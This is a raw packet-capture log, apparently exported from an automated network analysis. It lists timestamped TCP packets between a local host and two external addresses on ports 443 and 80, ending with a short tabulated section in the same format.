                                                                                          Jan 20, 2025 15:49:13.865844011 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:13.865854025 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.865875959 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.865890026 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:13.865897894 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.865909100 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.865930080 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:13.865961075 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:13.865967035 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.865979910 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.866009951 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:13.911082029 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:13.922629118 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.922688007 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.922805071 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.922806978 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:13.922831059 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.922856092 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:13.952163935 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.952229977 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.952388048 CET4434973854.231.134.241192.168.2.4
                                                                                          Jan 20, 2025 15:49:13.952424049 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:13.952452898 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:13.952452898 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:13.952863932 CET49738443192.168.2.454.231.134.241
                                                                                          Jan 20, 2025 15:49:16.518403053 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:16.523392916 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:16.523516893 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:16.523586988 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:16.528788090 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.156408072 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.156446934 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.156461954 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.156477928 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.156491995 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.156507969 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.156523943 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.156523943 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.156541109 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.156555891 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.156572104 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.156577110 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.157041073 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.157074928 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.157154083 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.161439896 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.161457062 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.161473989 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.161485910 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.161508083 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.161801100 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.252381086 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252408028 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252424955 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252439022 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252448082 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252456903 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252505064 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.252726078 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252742052 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252768993 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252775908 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252801895 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252816916 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.252847910 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.252847910 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.252887964 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.253638983 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.253654957 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.253670931 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.253686905 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.253704071 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.253720999 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.253731012 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.253731012 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.253798008 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.254544973 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.254559994 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.254576921 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.254609108 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.254623890 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.254650116 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.254650116 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.301626921 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.340876102 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.340905905 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.340923071 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.340936899 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.340951920 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.340966940 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.340975046 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.340975046 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.340982914 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341000080 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341037989 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.341124058 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.341289997 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341305971 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341320038 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341386080 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.341603994 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341674089 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.341685057 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341707945 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341722965 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341737986 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341751099 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.341753960 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341768026 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341784000 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.341825962 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.341825962 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.342427969 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.342444897 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.342468977 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.342485905 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.342494011 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.342509031 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.342523098 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.342524052 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.342524052 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.342540026 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.342566967 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.342566967 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.343422890 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.343439102 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.343453884 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.343467951 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.343482971 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.343494892 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536072016 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536073923 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536089897 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536107063 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536129951 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536140919 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536140919 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536145926 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536159992 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536174059 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536175966 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536187887 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536202908 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536217928 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536227942 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536227942 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536231995 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536246061 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536261082 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536274910 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536289930 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536300898 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536300898 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536303997 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536318064 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536333084 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536348104 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536350012 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536350012 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536362886 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536377907 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536391973 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536406994 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.536408901 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536408901 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.536462069 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.582962990 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.607402086 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607494116 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607530117 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607541084 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.607567072 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607601881 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607626915 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.607654095 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607707024 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607743979 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607783079 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.607794046 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607795954 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.607829094 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607862949 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607880116 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.607897997 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607930899 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607964993 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.607996941 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608012915 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.608012915 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.608031034 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608064890 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608097076 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608118057 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.608133078 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608150959 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.608166933 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608197927 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608237982 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608268976 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.608269930 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608280897 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.608304024 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608335972 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608345985 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.608372927 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608405113 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608441114 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.608491898 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.608491898 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.609236002 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609288931 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609323978 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609374046 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609375000 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.609426022 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609442949 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.609461069 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609493017 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609525919 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609527111 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.609560966 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609592915 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609627008 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609637022 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.609637022 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.609661102 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609694958 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609740019 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609743118 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.609791040 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609824896 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609838009 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.609858036 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609890938 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609910965 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.609949112 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.609985113 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.610034943 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.610034943 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.612596989 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.612656116 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.612688065 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.612705946 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.612756968 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.612796068 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.612809896 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.612843990 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.612850904 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.612895966 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.612929106 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.612958908 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.612962008 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.612993956 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613029957 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613044024 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.613064051 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613096952 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613116980 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.613131046 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613157988 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.613183975 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613218069 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613230944 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.613254070 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613286972 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613322020 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613332987 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.613353014 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613387108 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613420010 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613430023 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.613430023 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.613454103 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613490105 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.613555908 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614080906 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614115000 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614167929 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614178896 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614202023 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614234924 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614268064 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614279032 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614279985 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614303112 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614335060 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614365101 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614367962 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614402056 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614423990 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614435911 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614469051 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614502907 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614520073 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614537001 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614571095 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614619017 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614619970 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614623070 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614675045 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614727020 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614761114 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614764929 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614794970 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614833117 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614851952 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614865065 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614893913 CET4973980192.168.2.462.60.226.64
                                                                                          Jan 20, 2025 15:49:17.614901066 CET804973962.60.226.64192.168.2.4
                                                                                          Jan 20, 2025 15:49:17.614936113 CET804973962.60.226.64192.168.2.4
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Jan 20, 2025 15:49:17.614993095 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615006924 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.615042925 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615062952 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.615081072 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615113974 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615147114 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615175009 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.615180016 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615214109 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615237951 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.615246058 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615268946 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.615279913 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615333080 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615353107 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.615437031 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615488052 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.615511894 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.661000013 CET  49739        80         192.168.2.4    62.60.226.64
Jan 20, 2025 15:49:17.695380926 CET  80           49739      62.60.226.64   192.168.2.4
Jan 20, 2025 15:49:17.695413113 CET  80           49739      62.60.226.64   192.168.2.4
